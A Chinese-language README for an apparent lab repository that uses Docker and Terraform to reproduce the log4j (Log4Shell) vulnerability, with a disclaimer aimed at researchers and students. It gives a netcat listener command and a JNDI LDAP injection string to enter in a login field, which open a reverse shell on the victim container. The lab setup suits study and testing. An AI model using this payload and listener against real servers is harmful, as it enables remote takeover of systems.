本仓库旨在利用 Docker 和 Hashicorp Terraform 快速测试 log4j 漏洞。该测试的所有组件都将运行在 Docker 网络中的 Docker 容器内,可通过 'host.docker.internal' 进行访问。
该测试环境源自 Raxis 的一篇优秀博客文章:(https://raxis.com/blog/log4j-exploit)
易受攻击的应用程序和漏洞利用代码来自 cyberxml (https://github.com/cyberxml/log4j-poc)。
我所做的只是将环境代码化,使其易于快速启动并测试这个令人垂涎的漏洞。
对于因使用本仓库中的材料而可能导致的任何不良后果或恶意行为,我不承担任何责任。仅此而已。是否信任这些材料由你自行决定,同样,合乎道德地使用这些信息也是你的责任。我发布这些内容仅仅是为了让研究人员、学生和安全专业人士能够快速创建环境并自行测试该漏洞。Seacrest 到此结束。
使用 'docker exec -it netcat /bin/bash' 或类似命令进入 log4j_netcat 容器。一旦连接建立,你将在此处接收到与受害服务器的 shell 连接。
在 log4j_netcat 容器内的会话中,输入以下命令以启动监听器:
nc -lv -s 0.0.0.0 -p 9001
在 'Username' 字段中输入以下内容,并在 'Password' 字段中输入任意内容:
${jndi:ldap://host.docker.internal:1389/a}
返回 log4j_netcat 容器 shell,观察到你已连接到受害服务器。
去尽情捣乱吧!